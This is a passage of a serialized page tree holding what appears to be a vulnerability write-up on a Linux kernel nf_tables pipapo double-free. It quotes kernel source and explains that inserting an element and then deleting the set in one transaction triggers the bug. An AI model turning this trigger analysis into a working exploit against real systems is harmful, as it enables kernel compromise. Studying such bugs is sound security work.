nf_tables_set_elem_destroy",{"type":28,"tag":116,"props":51252,"children":51253},{"style":266},[51254],{"type":33,"value":313},{"type":28,"tag":116,"props":51256,"children":51257},{"style":376},[51258],{"type":33,"value":9323},{"type":28,"tag":116,"props":51260,"children":51261},{"style":376},[51262],{"type":33,"value":20814},{"type":28,"tag":116,"props":51264,"children":51265},{"style":266},[51266],{"type":33,"value":50690},{"type":28,"tag":116,"props":51268,"children":51269},{"style":370},[51270],{"type":33,"value":4240},{"type":28,"tag":116,"props":51272,"children":51273},{"style":272},[51274],{"type":33,"value":19944},{"type":28,"tag":116,"props":51276,"children":51277},{"style":266},[51278],{"type":33,"value":3178},{"type":28,"tag":116,"props":51280,"children":51281},{"class":245,"line":256},[51282,51287,51291,51295,51299,51303],{"type":28,"tag":116,"props":51283,"children":51284},{"style":376},[51285],{"type":33,"value":51286},"    const",{"type":28,"tag":116,"props":51288,"children":51289},{"style":376},[51290],{"type":33,"value":20814},{"type":28,"tag":116,"props":51292,"children":51293},{"style":266},[51294],{"type":33,"value":50718},{"type":28,"tag":116,"props":51296,"children":51297},{"style":370},[51298],{"type":33,"value":4240},{"type":28,"tag":116,"props":51300,"children":51301},{"style":272},[51302],{"type":33,"value":50639},{"type":28,"tag":116,"props":51304,"children":51305},{"style":266},[51306],{"type":33,"value":3178},{"type":28,"tag":116,"props":51308,"children":51309},{"class":245,"line":293},[51310,51314,51318,51323,51327,51332],{"type":28,"tag":116,"props":51311,"children":51312},{"style":376},[51313],{"type":33,"value":51286},{"type":28,"tag":116,"props":51315,"children":51316},{"style":376},[51317],{"type":33,"value":20814},{"type":28,"tag":116,"props":51319,"children":51320},{"style":266},[51321],{"type":33,"value":51322}," nft_elem_priv ",{"type":28,"tag":116,"props":51324,"children":51325},{"style":370},[51326],{"type":33,"value":4240},{"type":28,"tag":116,"props":51328,"children":51329},{"style":272},[51330],{"type":33,"value":51331},"elem_priv",{"type":28,"tag":116,"props":51333,"children":51334},{"style":266},[51335],{"type":33,"value":2830},{"type":28,"tag":116,"props":51337,"children":51338},{"class":245,"line":361},[51339],{"type":28,"tag":116,"props":51340,"children":51341},{"style":266},[51342],{"type":33,"value":10547},{"type":28,"tag":116,"props":51344,"children":51345},{"class":245,"line":387},[51346,51350,51355,51359,51364,51368,51373],{"type":28,"tag":116,"props":51347,"children":51348},{"style":376},[51349],{"type":33,"value":20814},{"type":28,"tag":116,"props":51351,"children":51352},{"style":266},[51353],{"type":33,"value":51354}," nft_set_ext ",{"type":28,"tag":116,"props":51356,"children":51357},{"style":370},[51358],{"type":33,"value":4240},{"type":28,"tag":116,"props":51360,"children":51361},{"style":266},[51362],{"type":33,"value":51363},"ext ",{"type":28,"tag":116,"props":51365,"children":51366},{"style":370},[51367],{"type":33,"value":373},{"type":28,"tag":116,"props":51369,"children":51370},{"style":282},[51371],{"type":33,"value":51372}," nft_set_elem_ext",{"type":28,"tag":116,"props":51374,"children":51375},{"style":266},[51376],{"type":33,"value":51377},"(set, elem_priv);\n",{"type":28,"tag":116,"props":51379,"children":51380},{"class":245,"line":400},[51381],{"type":28,"tag":116,"props":51382,"children":51383},{"emptyLinePlaceholder":19},[51384],{"type":33,"value":1044},{"type":28,"tag":116,"props":51386,"children":51387},{"class":245,"line":614},[51388,51392,51396,51401],{"type":28,"tag":116,"props":51389,"children":51390},{"style":260},[51391],{"type":33,"value":15449},{"type":28,"tag":116,"props":51393,"children":51394},{"style":266},[51395],{"type":33,"value":269},{"type":28,"tag":116,"props":51397,"children":51398},{"style":282},[51399],{"type":33,"value":51400},"nft_set_ext_exists",{"type":28,"tag":116,"props":51402,"children":51403},{"style":266},[51404],{"type":33,"value":51405},"(ext, NFT_SET_EXT_EXPRESSIONS))\n",{"type":28,"tag":116,"props":51407,"children":51408},{"class":245,"line":631},[51409,51414,51419,51424],{"type":28,"tag":116,"props":51410,"children":51411},{"style":282},[51412],{"type":33,"value":51413},"  nft_set_elem_expr_destroy",{"type":28,"tag":116,"props":51415,"children":51416},{"style":266},[51417],{"type":33,"value":51418},"(ctx, ",{"type":28,"tag":116,"props":51420,"children":51421},{"style":282},[51422],{"type":33,"value":51423},"nft_set_ext_expr",{"type":28,"tag":116,"props":51425,"children":51426},{"style":266},[51427],{"type":33,"value":51428},"(ext));\n",{"type":28,"tag":116,"props":51430,"children":51431},{"class":245,"line":665},[51432],{"type":28,"tag":116,"props":51433,"children":51434},{"emptyLinePlaceholder":19},[51435],{"type":33,"value":1044},{"type":28,"tag":116,"props":51437,"children":51438},{"class":245,"line":713},[51439,51444],{"type":28,"tag":116,"props":51440,"children":51441},{"style":282},[51442],{"type":33,"value":51443}," kfree",{"type":28,"tag":116,"props":51445,"children":51446},{"style":266},[51447],{"type":33,"value":51448},"(elem_priv);\n",{"type":28,"tag":116,"props":51450,"children":51451},{"class":245,"line":750},[51452],{"type":28,"tag":116,"props":51453,"children":51454},{"style":266},[51455],{"type":33,"value":406},{"type":28,"tag":29,"props":51457,"children":51458},{},[51459,51460,51466,51468,51473,51475,51480,51482,51487,51488,51493,51495,51500,51502,51507,51509,51514],{"type":33,"value":16275},{"type":28,"tag":98,"props":51461,"children":51463},{"className":51462},[],[51464],{"type":33,"value":51465},"nft_pipapo_match",{"type":33,"value":51467}," objects contain views of the ",{"type":28,"tag":98,"props":51469,"children":51471},{"className":51470},[],[51472],{"type":33,"value":50631},{"type":33,"value":51474},"'s of a ",{"type":28,"tag":98,"props":51476,"children":51478},{"className":51477},[],[51479],{"type":33,"value":50639},{"type":33,"value":51481},". The difference between the ",{"type":28,"tag":98,"props":51483,"children":51485},{"className":51484},[],[51486],{"type":33,"value":50616},{"type":33,"value":10659},{"type":28,"tag":98,"props":51489,"children":51491},{"className":51490},[],[51492],{"type":33,"value":50600},{"type":33,"value":51494}," match objects is that the clone has a view of not only already committed ",{"type":28,"tag":98,"props":51496,"children":51498},{"className":51497},[],[51499],{"type":33,"value":50631},{"type":33,"value":51501},"'s that the \"normal\" one has but also a view of the ",{"type":28,"tag":98,"props":51503,"children":51505},{"className":51504},[],[51506],{"type":33,"value":50631},{"type":33,"value":51508},"'s that was still not committed that only exists in the current control-plane. In other words, the control plane makes changes to the clone, and if the commit path is reached, the changes are committed to ",{"type":28,"tag":98,"props":51510,"children":51512},{"className":51511},[],[51513],{"type":33,"value":50616},{"type":33,"value":141},{"type":28,"tag":75,"props":51516,"children":51518},{"id":51517},"root-cause-analysis",[51519],{"type":33,"value":51520},"Root-cause analysis",{"type":28,"tag":29,"props":51522,"children":51523},{},[51524,51526,51532,51534,51539],{"type":33,"value":51525},"So ",{"type":28,"tag":98,"props":51527,"children":51529},{"className":51528},[],[51530],{"type":33,"value":51531},"nf_tables_set_elem_destroy",{"type":33,"value":51533}," being called for both match objects seems like a pretty straightforward double-free of the ",{"type":28,"tag":98,"props":51535,"children":51537},{"className":51536},[],[51538],{"type":33,"value":50631},{"type":33,"value":51540},"s that had already been committed since those will have duplicated views. At first glance, this is some bizarre-looking code. How did this bug come to be? How was it not detected before? Let's try to get to the bottom of it.",{"type":28,"tag":29,"props":51542,"children":51543},{},[51544,51546,51551,51553,51558,51560,51565,51567,51572,51574,51579],{"type":33,"value":51545},"We should now try to understand how to reach that path with the ",{"type":28,"tag":98,"props":51547,"children":51549},{"className":51548},[],[51550],{"type":33,"value":50593},{"type":33,"value":51552}," flag set, which is a member of the private data of a pipapo ",{"type":28,"tag":98,"props":51554,"children":51556},{"className":51555},[],[51557],{"type":33,"value":50631},{"type":33,"value":51559}," that becomes true whenever a change is made to the ",{"type":28,"tag":98,"props":51561,"children":51563},{"className":51562},[],[51564],{"type":33,"value":50639},{"type":33,"value":51566}," during the control-plane pass of a transaction. This is to tell the commit path that this ",{"type":28,"tag":98,"props":51568,"children":51570},{"className":51569},[],[51571],{"type":33,"value":50639},{"type":33,"value":51573}," has changes that have to be committed. If we refer to the code, we see that we can make the ",{"type":28,"tag":98,"props":51575,"children":51577},{"className":51576},[],[51578],{"type":33,"value":50639},{"type":33,"value":51580}," dirty by inserting a new element.",{"type":28,"tag":234,"props":51582,"children":51584},{"className":16176,"code":51583,"language":1797,"meta":7,"style":7},"static int nft_pipapo_insert(const struct net *net, const struct nft_set *set,\n        const struct nft_set_elem *elem,\n        struct nft_elem_priv **elem_priv)\n{\n[...]\n priv->dirty = true;\n[...]\n}\n",[51585],{"type":28,"tag":98,"props":51586,"children":51587},{"__ignoreMap":7},[51588,51658,51687,51712,51719,51726,51755,51762],{"type":28,"tag":116,"props":51589,"children":51590},{"class":245,"line":246},[51591,51595,51599,51604,51608,51612,51616,51621,51625,51630,51634,51638,51642,51646,51650,51654],{"type":28,"tag":116,"props":51592,"children":51593},{"style":376},[51594],{"type":33,"value":50664},{"type":28,"tag":116,"props":51596,"children":51597},{"style":376},[51598],{"type":33,"value":50792},{"type":28,"tag":116,"props":51600,"children":51601},{"style":282},[51602],{"type":33,"value":51603}," nft_pipapo_insert",{"type":28,"tag":116,"props":51605,"children":51606},{"style":266},[51607],{"type":33,"value":313},{"type":28,"tag":116,"props":51609,"children":51610},{"style":376},[51611],{"type":33,"value":9323},{"type":28,"tag":116,"props":51613,"children":51614},{"style":376},[51615],{"type":33,"value":20814},{"type":28,"tag":116,"props":51617,"children":51618},{"style":266},[51619],{"type":33,"value":51620}," net ",{"type":28,"tag":116,"props":51622,"children":51623},{"style":370},[51624],{"type":33,"value":4240},{"type":28,"tag":116,"props":51626,"children":51627},{"style":272},[51628],{"type":33,"value":51629},"net",{"type":28,"tag":116,"props":51631,"children":51632},{"style":266},[51633],{"type":33,"value":825},{"type":28,"tag":116,"props":51635,"children":51636},{"style":376},[51637],{"type":33,"value":9323},{"type":28,"tag":116,"props":51639,"children":51640},{"style":376},[51641],{"type":33,"value":20814},{"type":28,"tag":116,"props":51643,"children":51644},{"style":266},[51645],{"type":33,"value":50718},{"type":28,"tag":116,"props":51647,"children":51648},{"style":370},[51649],{"type":33,"value":4240},{"type":28,"tag":116,"props":51651,"children":51652},{"style":272},[51653],{"type":33,"value":50639},{"type":28,"tag":116,"props":51655,"children":51656},{"style":266},[51657],{"type":33,"value":3178},{"type":28,"tag":116,"props":51659,"children":51660},{"class":245,"line":256},[51661,51665,51669,51674,51678,51683],{"type":28,"tag":116,"props":51662,"children":51663},{"style":376},[51664],{"type":33,"value":32538},{"type":28,"tag":116,"props":51666,"children":51667},{"style":376},[51668],{"type":33,"value":20814},{"type":28,"tag":116,"props":51670,"children":51671},{"style":266},[51672],{"type":33,"value":51673}," nft_set_elem ",{"type":28,"tag":116,"props":51675,"children":51676},{"style":370},[51677],{"type":33,"value":4240},{"type":28,"tag":116,"props":51679,"children":51680},{"style":272},[51681],{"type":33,"value":51682},"elem",{"type":28,"tag":116,"props":51684,"children":51685},{"style":266},[51686],{"type":33,"value":3178},{"type":28,"tag":116,"props":51688,"children":51689},{"class":245,"line":293},[51690,51695,51699,51704,51708],{"type":28,"tag":116,"props":51691,"children":51692},{"style":376},[51693],{"type":33,"value":51694},"        struct",{"type":28,"tag":116,"props":51696,"children":51697},{"style":266},[51698],{"type":33,"value":51322},{"type":28,"tag":116,"props":51700,"children":51701},{"style":370},[51702],{"type":33,"value":51703},"**",{"type":28,"tag":116,"props":51705,"children":51706},{"style":272},[51707],{"type":33,"value":51331},{"type":28,"tag":116,"props":51709,"children":51710},{"style":266},[51711],{"type":33,"value":2830},{"type":28,"tag":116,"props":51713,"children":51714},{"class":245,"line":361},[51715],{"type":28,"tag":116,"props":51716,"children":51717},{"style":266},[51718],{"type":33,"value":10547},{"type":28,"tag":116,"props":51720,"children":51721},{"class":245,"line":387},[51722],{"type":28,"tag":116,"props":51723,"children":51724},{"style":266},[51725],{"type":33,"value":9986},{"type":28,"tag":116,"props":51727,"children":51728},{"class":245,"line":400},[51729,51734,51738,51743,51747,51751],{"type":28,"tag":116,"props":51730,"children":51731},{"style":272},[51732],{"type":33,"value":51733}," priv",{"type":28,"tag":116,"props":51735,"children":51736},{"style":266},[51737],{"type":33,"value":13423},{"type":28,"tag":116,"props":51739,"children":51740},{"style":272},[51741],{"type":33,"value":51742},"dirty",{"type":28,"tag":116,"props":51744,"children":51745},{"style":370},[51746],{"type":33,"value":2226},{"type":28,"tag":116,"props":51748,"children":51749},{"style":376},[51750],{"type":33,"value":1129},{"type":28,"tag":116,"props":51752,"children":51753},{"style":266},[51754],{"type":33,"value":384},{"type":28,"tag":116,"props":51756,"children":51757},{"class":245,"line":614},[51758],{"type":28,"tag":116,"props":51759,"children":51760},{"style":266},[51761],{"type":33,"value":9986},{"type":28,"tag":116,"props":51763,"children":51764},{"class":245,"line":631},[51765],{"type":28,"tag":116,"props":51766,"children":51767},{"style":266},[51768],{"type":33,"value":406},{"type":28,"tag":29,"props":51770,"children":51771},{},[51772],{"type":33,"value":51773},"We also see that when the changes are commited, this flag is then unset.",{"type":28,"tag":234,"props":51775,"children":51777},{"className":16176,"code":51776,"language":1797,"meta":7,"style":7},"static void nft_pipapo_commit(struct nft_set *set)\n{\n[...]\n if (!priv->dirty)\n  return;\n[...]\n priv->dirty = false;\n[...]\n}\n",[51778],{"type":28,"tag":98,"props":51779,"children":51780},{"__ignoreMap":7},[51781,51821,51828,51835,51866,51877,51884,51911,51918],{"type":28,"tag":116,"props":51782,"children":51783},{"class":245,"line":246},[51784,51788,51792,51797,51801,51805,51809,51813,51817],{"type":28,"tag":116,"props":51785,"children":51786},{"style":376},[51787],{"type":33,"value":50664},{"type":28,"tag":116,"props":51789,"children":51790},{"style":376},[51791],{"type":33,"value":2169},{"type":28,"tag":116,"props":51793,"children":51794},{"style":282},[51795],{"type":33,"value":51796}," nft_pipapo_commit",{"type":28,"tag":116,"props":51798,"children":51799},{"style":266},[51800],{"type":33,"value":313},{"type":28,"tag":116,"props":51802,"children":51803},{"style":376},[51804],{"type":33,"value":9069},{"type":28,"tag":116,"props":51806,"children":51807},{"style":266},[51808],{"type":33,"value":50718},{"type":28,"tag":116,"props":51810,"children":51811},{"style":370},[51812],{"type":33,"value":4240},{"type":28,"tag":116,"props":51814,"children":51815},{"style":272},[51816],{"type":33,"value":50639},{"type":28,"tag":116,"props":51818,"children":51819},{"style":266},[51820],{"type":33,"value":2830},{"type":28,"tag":116,"props":51822,"children":51823},{"class":245,"line":256},[51824],{"type":28,"tag":116,"props":51825,"children":51826},{"style":266},[51827],{"type":33,"value":10547},{"type":28,"tag":116,"props":51829,"children":51830},{"class":245,"line":293},[51831],{"type":28,"tag":116,"props":51832,"children":51833},{"style":266},[51834],{"type":33,"value":9986},{"type":28,"tag":116,"props":51836,"children":51837},{"class":245,"line":361},[51838,51842,51846,51850,51854,51858,51862],{"type":28,"tag":116,"props":51839,"children":51840},{"style":260},[51841],{"type":33,"value":15449},{"type":28,"tag":116,"props":51843,"children":51844},{"style":266},[51845],{"type":33,"value":269},{"type":28,"tag":116,"props":51847,"children":51848},{"style":370},[51849],{"type":33,"value":20285},{"type":28,"tag":116,"props":51851,"children":51852},{"style":272},[51853],{"type":33,"value":51193},{"type":28,"tag":116,"props":51855,"children":51856},{"style":266},[51857],{"type":33,"value":13423},{"type":28,"tag":116,"props":51859,"children":51860},{"style":272},[51861],{"type":33,"value":51742},{"type":28,"tag":116,"props":51863,"children":51864},{"style":266},[51865],{"type":33,"value":2830},{"type":28,"tag":116,"props":51867,"children":51868},{"class":245,"line":387},[51869,51873],{"type":28,"tag":116,"props":51870,"children":51871},{"style":260},[51872],{"type":33,"value":38820},{"type":28,"tag":116,"props":51874,"children":51875},{"style":266},[51876],{"type":33,"value":384},{"type":28,"tag":116,"props":51878,"children":51879},{"class":245,"line":400},[51880],{"type":28,"tag":116,"props":51881,"children":51882},{"style":266},[51883],{"type":33,"value":9986},{"type":28,"tag":116,"props":51885,"children":51886},{"class":245,"line":614},[51887,51891,51895,51899,51903,51907],{"type":28,"tag":116,"props":51888,"children":51889},{"style":272},[51890],{"type":33,"value":51733},{"type":28,"tag":116,"props":51892,"children":51893},{"style":266},[51894],{"type":33,"value":13423},{"type":28,"tag":116,"props":51896,"children":51897},{"style":272},[51898],{"type":33,"value":51742},{"type":28,"tag":116,"props":51900,"children":51901},{"style":370},[51902],{"type":33,"value":2226},{"type":28,"tag":116,"props":51904,"children":51905},{"style":376},[51906],{"type":33,"value":1022},{"type":28,"tag":116,"props":51908,"children":51909},{"style":266},[51910],{"type":33,"value":384},{"type":28,"tag":116,"props":51912,"children":51913},{"class":245,"line":631},[51914],{"type":28,"tag":116,"props":51915,"children":51916},{"style":266},[51917],{"type":33,"value":9986},{"type":28,"tag":116,"props":51919,"children":51920},{"class":245,"line":665},[51921],{"type":28,"tag":116,"props":51922,"children":51923},{"style":266},[51924],{"type":33,"value":406},{"type":28,"tag":29,"props":51926,"children":51927},{},[51928,51930,51935,51937,51942,51944,51949,51951,51956,51958,51964,51966,51972,51974,51979],{"type":33,"value":51929},"We can conclude that as long as we can, in the same transaction, insert a ",{"type":28,"tag":98,"props":51931,"children":51933},{"className":51932},[],[51934],{"type":33,"value":50631},{"type":33,"value":51936}," in the ",{"type":28,"tag":98,"props":51938,"children":51940},{"className":51939},[],[51941],{"type":33,"value":50639},{"type":33,"value":51943}," to make it dirty and then delete the ",{"type":28,"tag":98,"props":51945,"children":51947},{"className":51946},[],[51948],{"type":33,"value":50639},{"type":33,"value":51950},", we will be able to trigger the double-free. But there is another condition: in the commit path, if a ",{"type":28,"tag":98,"props":51952,"children":51954},{"className":51953},[],[51955],{"type":33,"value":50639},{"type":33,"value":51957},"'s ",{"type":28,"tag":98,"props":51959,"children":51961},{"className":51960},[],[51962],{"type":33,"value":51963},"->commit()",{"type":33,"value":51965}," method is executed before its ",{"type":28,"tag":98,"props":51967,"children":51969},{"className":51968},[],[51970],{"type":33,"value":51971},"->destroy()",{"type":33,"value":51973}," method, then the ",{"type":28,"tag":98,"props":51975,"children":51977},{"className":51976},[],[51978],{"type":33,"value":51742},{"type":33,"value":51980}," flag will be unset, and we won't be able to trigger the double-free.",{"type":28,"tag":29,"props":51982,"children":51983},{},[51984],{"type":33,"value":51985},"Let's once again refer to the code and see how these methods are called.",{"type":28,"tag":234,"props":51987,"children":51989},{"className":16176,"code":51988,"language":1797,"meta":7,"style":7},"static int nf_tables_commit(struct net *net, struct sk_buff *skb)\n{\n[...]\n  case NFT_MSG_DELSET:\n  case NFT_MSG_DESTROYSET: // [1]\n   nft_trans_set(trans)->dead = 1; // [2]\n   list_del_rcu(&nft_trans_set(trans)->list);\n   nf_tables_set_notify(&trans->ctx, nft_trans_set(trans),\n          trans->msg_type, GFP_KERNEL);\n   break;\n  case NFT_MSG_NEWSETELEM: // [3]\n[...]\n   if (te->set->ops->commit &&\n       list_empty(&te->set->pending_update)) {\n    list_add_tail(&te->set->pending_update,\n           &set_update_list);\n   }\n[...]\n }\n\n nft_set_commit_update(&set_update_list);\n[...]\n nf_tables_commit_release(net);\n\n return 0;\n}\n",[51990],{"type":28,"tag":98,"props":51991,"children":51992},{"__ignoreMap":7},[51993,52055,52062,52069,52077,52090,52125,52159,52201,52223,52235,52248,52255,52303,52344,52384,52397,52404,52411,52418,52425,52450,52457,52470,52477,52493],{"type":28,"tag":116,"props":51994,"children":51995},{"class":245,"line":246},[51996,52000,52004,52009,52013,52017,52021,52025,52029,52033,52037,52042,52046,52051],{"type":28,"tag":116,"props":51997,"children":51998},{"style":376},[51999],{"type":33,"value":50664},{"type":28,"tag":116,"props":52001,"children":52002},{"style":376},[52003],{"type":33,"value":50792},{"type":28,"tag":116,"props":52005,"children":52006},{"style":282},[52007],{"type":33,"value":52008}," nf_tables_commit",{"type":28,"tag":116,"props":52010,"children":52011},{"style":266},[52012],{"type":33,"value":313},{"type":28,"tag":116,"props":52014,"children":52015},{"style":376},[52016],{"type":33,"value":9069},{"type":28,"tag":116,"props":52018,"children":52019},{"style":266},[52020],{"type":33,"value":51620},{"type":28,"tag":116,"props":52022,"children":52023},{"style":370},[52024],{"type":33,"value":4240},{"type":28,"tag":116,"props":52026,"children":52027},{"style":272},[52028],{"type":33,"value":51629},{"type":28,"tag":116,"props":52030,"children":52031},{"style":266},[52032],{"type":33,"value":825},{"type":28,"tag":116,"props":52034,"children":52035},{"style":376},[52036],{"type":33,"value":9069},{"type":28,"tag":116,"props":52038,"children":52039},{"style":266},[52040],{"type":33,"value":52041}," sk_buff ",{"type":28,"tag":116,"props":52043,"children":52044},{"style":370},[52045],{"type":33,"value":4240},{"type":28,"tag":116,"props":52047,"children":52048},{"style":272},[52049],{"type":33,"value":52050},"skb",{"type":28,"tag":116,"props":52052,"children":52053},{"style":266},[52054],{"type":33,"value":2830},{"type":28,"tag":116,"props":52056,"children":52057},{"class":245,"line":256},[52058],{"type":28,"tag":116,"props":52059,"children":52060},{"style":266},[52061],{"type":33,"value":10547},{"type":28,"tag":116,"props":52063,"children":52064},{"class":245,"line":293},[52065],{"type":28,"tag":116,"props":52066,"children":52067},{"style":266},[52068],{"type":33,"value":9986},{"type":28,"tag":116,"props":52070,"children":52071},{"class":245,"line":361},[52072],{"type":28,"tag":116,"props":52073,"children":52074},{"style":266},[52075],{"type":33,"value":52076},"  case NFT_MSG_DELSET:\n",{"type":28,"tag":116,"props":52078,"children":52079},{"class":245,"line":387},[52080,52085],{"type":28,"tag":116,"props":52081,"children":52082},{"style":266},[52083],{"type":33,"value":52084},"  case NFT_MSG_DESTROYSET:",{"type":28,"tag":116,"props":52086,"children":52087},{"style":250},[52088],{"type":33,"value":52089}," // [1]\n",{"type":28,"tag":116,"props":52091,"children":52092},{"class":245,"line":400},[52093,52098,52103,52108,52112,52116,52120],{"type":28,"tag":116,"props":52094,"children":52095},{"style":282},[52096],{"type":33,"value":52097},"   nft_trans_set",{"type":28,"tag":116,"props":52099,"children":52100},{"style":266},[52101],{"type":33,"value":52102},"(trans)->",{"type":28,"tag":116,"props":52104,"children":52105},{"style":272},[52106],{"type":33,"value":52107},"dead",{"type":28,"tag":116,"props":52109,"children":52110},{"style":370},[52111],{"type":33,"value":2226},{"type":28,"tag":116,"props":52113,"children":52114},{"style":350},[52115],{"type":33,"value":4192},{"type":28,"tag":116,"props":52117,"children":52118},{"style":266},[52119],{"type":33,"value":48695},{"type":28,"tag":116,"props":52121,"children":52122},{"style":250},[52123],{"type":33,"value":52124}," // [2]\n",{"type":28,"tag":116,"props":52126,"children":52127},{"class":245,"line":614},[52128,52133,52137,52141,52146,52150,52155],{"type":28,"tag":116,"props":52129,"children":52130},{"style":282},[52131],{"type":33,"value":52132},"   list_del_rcu",{"type":28,"tag":116,"props":52134,"children":52135},{"style":266},[52136],{"type":33,"value":313},{"type":28,"tag":116,"props":52138,"children":52139},{"style":370},[52140],{"type":33,"value":2780},{"type":28,"tag":116,"props":52142,"children":52143},{"style":282},[52144],{"type":33,"value":52145},"nft_trans_set",{"type":28,"tag":116,"props":52147,"children":52148},{"style":266},[52149],{"type":33,"value":52102},{"type":28,"tag":116,"props":52151,"children":52152},{"style":272},[52153],{"type":33,"value":52154},"list",{"type":28,"tag":116,"props":52156,"children":52157},{"style":266},[52158],{"type":33,"value":895},{"type":28,"tag":116,"props":52160,"children":52161},{"class":245,"line":631},[52162,52167,52171,52175,52180,52184,52188,52192,52196],{"type":28,"tag":116,"props":52163,"children":52164},{"style":282},[52165],{"type":33,"value":52166},"   nf_tables_set_notify",{"type":28,"tag":116,"props":52168,"children":52169},{"style":266},[52170],{"type":33,"value":313},{"type":28,"tag":116,"props":52172,"children":52173},{"style":370},[52174],{"type":33,"value":2780},{"type":28,"tag":116,"props":52176,"children":52177},{"style":272},[52178],{"type":33,"value":52179},"trans",{"type":28,"tag":116,"props":52181,"children":52182},{"style":266},[52183],{"type":33,"value":13423},{"type":28,"tag":116,"props":52185,"children":52186},{"style":272},[52187],{"type":33,"value":19944},{"type":28,"tag":116,"props":52189,"children":52190},{"style":266},[52191],{"type":33,"value":825},{"type":28,"tag":116,"props":52193,"children":52194},{"style":282},[52195],{"type":33,"value":52145},{"type":28,"tag":116,"props":52197,"children":52198},{"style":266},[52199],{"type":33,"value":52200},"(trans),\n",{"type":28,"tag":116,"props":52202,"children":52203},{"class":245,"line":665},[52204,52209,52213,52218],{"type":28,"tag":116,"props":52205,"children":52206},{"style":272},[52207],{"type":33,"value":52208},"          trans",{"type":28,"tag":116,"props":52210,"children":52211},{"style":266},[52212],{"type":33,"value":13423},{"type":28,"tag":116,"props":52214,"children":52215},{"style":272},[52216],{"type":33,"value":52217},"msg_type",{"type":28,"tag":116,"props":52219,"children":52220},{"style":266},[52221],{"type":33,"value":52222},", GFP_KERNEL);\n",{"type":28,"tag":116,"props":52224,"children":52225},{"class":245,"line":713},[52226,52231],{"type":28,"tag":116,"props":52227,"children":52228},{"style":260},[52229],{"type":33,"value":52230},"   break",{"type":28,"tag":116,"props":52232,"children":52233},{"style":266},[52234],{"type":33,"value":384},{"type":28,"tag":116,"props":52236,"children":52237},{"class":245,"line":750},[52238,52243],{"type":28,"tag":116,"props":52239,"children":52240},{"style":266},[52241],{"type":33,"value":52242},"  case NFT_MSG_NEWSETELEM:",{"type":28,"tag":116,"props":52244,"children":52245},{"style":250},[52246],{"type":33,"value":52247}," // [3]\n",{"type":28,"tag":116,"props":52249,"children":52250},{"class":245,"line":779},[52251],{"type":28,"tag":116,"props":52252,"children":52253},{"style":266},[52254],{"type":33,"value":9986},{"type":28,"tag":116,"props":52256,"children":52257},{"class":245,"line":796},[52258,52263,52267,52272,52276,52280,52284,52289,52293,52298],{"type":28,"tag":116,"props":52259,"children":52260},{"style":260},[52261],{"type":33,"value":52262},"   if",{"type":28,"tag":116,"props":52264,"children":52265},{"style":266},[52266],{"type":33,"value":269},{"type":28,"tag":116,"props":52268,"children":52269},{"style":272},[52270],{"type":33,"value":52271},"te",{"type":28,"tag":116,"props":52273,"children":52274},{"style":266},[52275],{"type":33,"value":13423},{"type":28,"tag":116,"props":52277,"children":52278},{"style":272},[52279],{"type":33,"value":50639},{"type":28,"tag":116,"props":52281,"children":52282},{"style":266},[52283],{"type":33,"value":13423},{"type":28,"tag":116,"props":52285,"children":52286},{"style":272},[52287],{"type":33,"value":52288},"ops",{"type":28,"tag":116,"props":52290,"children":52291},{"style":266},[52292],{"type":33,"value":13423},{"type":28,"tag":116,"props":52294,"children":52295},{"style":272},[52296],{"type":33,"value":52297},"commit",{"type":28,"tag":116,"props":52299,"children":52300},{"style":370},[52301],{"type":33,"value":52302}," &&\n",{"type":28,"tag":116,"props":52304,"children":52305},{"class":245,"line":847},[52306,52311,52315,52319,52323,52327,52331,52335,52340],{"type":28,"tag":116,"props":52307,"children":52308},{"style":282},[52309],{"type":33,"value":52310},"       list_empty",{"type":28,"tag":116,"props":52312,"children":52313},{"style":266},[52314],{"type":33,"value":313},{"type":28,"tag":116,"props":52316,"children":52317},{"style":370},[52318],{"type":33,"value":2780},{"type":28,"tag":116,"props":52320,"children":52321},{"style":272},[52322],{"type":33,"value":52271},{"type":28,"tag":116,"props":52324,"children":52325},{"style":266},[52326],{"type":33,"value":13423},{"type":28,"tag":116,"props":52328,"children":52329},{"style":272},[52330],{"type":33,"value":50639},{"type":28,"tag":116,"props":52332,"children":52333},{"style":266},[52334],{"type":33,"value":13423},{"type":28,"tag":116,"props":52336,"children":52337},{"style":272},[52338],{"type":33,"value":52339},"pending_update",{"type":28,"tag":116,"props":52341,"children":52342},{"style":266},[52343],{"type":33,"value":34820},{"type":28,"tag":116,"props":52345,"children":52346},{"class":245,"line":898},[52347,52352,52356,52360,52364,52368,52372,52376,52380],{"type":28,"tag":116,"props":52348,"children":52349},{"style":282},[52350],{"type":33,"value":52351},"    list_add_tail",{"type":28,"tag":116,"props":52353,"children":52354},{"style":266},[52355],{"type":33,"value":313},{"type":28,"tag":116,"props":52357,"children":52358},{"style":370},[52359],{"type":33,"value":2780},{"type":28,"tag":116,"props":52361,"children":52362},{"style":272},[52363],{"type":33,"value":52271},{"type":28,"tag":116,"props":52365,"children":52366},{"style":266},[52367],{"type":33,"value":13423},{"type":28,"tag":116,"props":52369,"children":52370},{"style":272},[52371],{"type":33,"value":50639},{"type":28,"tag":116,"props":52373,"children":52374},{"style":266},[52375],{"type":33,"value":13423},{"type":28,"tag":116,"props":52377,"children":52378},{"style":272},[52379],{"type":33,"value":52339},{"type":28,"tag":116,"props":52381,"children":52382},{"style":266},[52383],{"type":33,"value":3178},{"type":28,"tag":116,"props":52385,"children":52386},{"class":245,"line":907},[52387,52392],{"type":28,"tag":116,"props":52388,"children":52389},{"style":370},[52390],{"type":33,"value":52391},"           &",{"type":28,"tag":116,"props":52393,"children":52394},{"style":266},[52395],{"type":33,"value":52396},"set_update_list);\n",{"type":28,"tag":116,"props":52398,"children":52399},{"class":245,"line":981},[52400],{"type":28,"tag":116,"props":52401,"children":52402},{"style":266},[52403],{"type":33,"value":34377},{"type":28,"tag":116,"props":52405,"children":52406},{"class":245,"line":1011},[52407],{"type":28,"tag":116,"props":52408,"children":52409},{"style":266},[52410],{"type":33,"value":9986},{"type":28,"tag":116,"props":52412,"children":52413},{"class":245,"line":1029},[52414],{"type":28,"tag":116,"props":52415,"children":52416},{"style":266},[52417],{"type":33,"value":9264},{"type":28,"tag":116,"props":52419,"children":52420},{"class":245,"line":1038},[52421],{"type":28,"tag":116,"props":52422,"children":52423},{"emptyLinePlaceholder":19},[52424],{"type":33,"value":1044},{"type":28,"tag":116,"props":52426,"children":52427},{"class":245,"line":1047},[52428,52433,52437,52441,52446],{"type":28,"tag":116,"props":52429,"children":52430},{"style":282},[52431],{"type":33,"value":52432}," 